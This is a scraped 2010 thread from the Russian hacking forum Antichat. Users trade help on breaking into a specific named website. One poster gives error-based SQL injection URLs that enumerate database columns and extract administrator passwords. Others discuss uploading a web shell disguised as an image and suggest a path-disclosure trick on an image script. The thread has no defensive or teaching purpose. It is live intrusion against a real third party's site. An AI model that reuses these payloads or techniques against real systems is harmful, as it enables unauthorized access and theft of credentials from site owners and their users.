Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
21.04.2010, 19:48
|
|
Участник форума
Регистрация: 13.12.2009
Сообщений: 130
Провел на форуме:
540530
Репутация:
54
|
|
thanks=)
|
|
|
21.04.2010, 19:53
|
|
Постоянный
Регистрация: 18.02.2008
Сообщений: 368
Провел на форуме:
4075418
Репутация:
386
|
|
Сообщение от GOGA075
Какой функцией нужно делать поиск по БД?
http://www.mysql.ru/docs/man/String_comparison_functions.html
мм ? или
http://www.mysql.ru/docs/man/Fulltext_Search.html
Последний раз редактировалось warlok; 21.04.2010 в 19:56..
|
|
|
|
21.04.2010, 20:15
|
|
Участник форума
Регистрация: 30.03.2008
Сообщений: 208
Провел на форуме:
869744
Репутация:
18
|
|
warlok, а может чо по проще?
А то там ничего не понятно!!!!!
|
|
|
|
21.04.2010, 21:08
|
|
Участник форума
Регистрация: 24.08.2009
Сообщений: 172
Провел на форуме:
1535319
Репутация:
-16
|
|
http://medtechservice.am/index.php?mod=pages&act=show&menu_id=159+and+(Sele ct+1+From+(Select+count(0),concat((Select+column_N ame+from+information_schema.columns+where+table_Na me=0x61646D696E6973747261746F727331+limit+8,1),flo or(rand(0)*2))+From+menus+Group+By+2)a)
не мояу наыти column_name
помоqите
|
|
|
|
21.04.2010, 23:34
|
|
Участник форума
Регистрация: 30.03.2008
Сообщений: 208
Провел на форуме:
869744
Репутация:
18
|
|
Пипл, подскажите как дклать поиск по БД....
|
|
|
|
22.04.2010, 01:58
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557
Репутация:
606
|
|
Сообщение от GOGA075
warlok, а может чо по проще?
А то там ничего не понятно!!!!!
попроще - заюзай phpmyadmin
|
|
|
|
22.04.2010, 07:14
|
|
Участник форума
Регистрация: 30.03.2008
Сообщений: 208
Провел на форуме:
869744
Репутация:
18
|
|
попугай, возможнасти залить нету!!!
там есть возможность залить шел через картинку, но только адрес до него что-то типо getimg.php?type=main&file=08736050.php
а прямой путь нужно в БД искать!!!
|
|
|
|
22.04.2010, 08:32
|
|
Участник форума
Регистрация: 24.08.2009
Сообщений: 172
Провел на форуме:
1535319
Репутация:
-16
|
|
http://medtechservice.am/index.php?mod=pages&act=show&menu_id=159+and+(Sele ct+1+From+(Select+count(0),concat((Select+pass+fro m+administrators+limit+1,1),floor(rand(0)*2))+From +administrators+Group+By+2)a)
вот нашел table_name и у нево column_name а теперь не получается..
pomoqite..
|
|
|
|
22.04.2010, 13:57
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557
Репутация:
606
|
|
Сообщение от GOGA075
попугай, возможнасти залить нету!!!
там есть возможность залить шел через картинку, но только адрес до него что-то типо getimg.php?type=main&file=08736050.php
а прямой путь нужно в БД искать!!!
попробуй раскрыть путь, например,
getimg.php?type=main&file[]=08736050.php'
или в папках типа uploads, images глянуть. Это если файлы не в базу записываются.
|
|
|
|
22.04.2010, 17:08
|
|
Участник форума
Регистрация: 06.02.2008
Сообщений: 110
Провел на форуме:
217423
Репутация:
32
|
|
про mod rewrite
Вопрос наверное риторический. Наверное многим попадались сайты, где скажем ссылки типа http://site.com/news/news567.html.... Такое чувство, что включен mod rewrite, а не статические страницы. Можно ли здесь найти sql-инъекцию например?
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
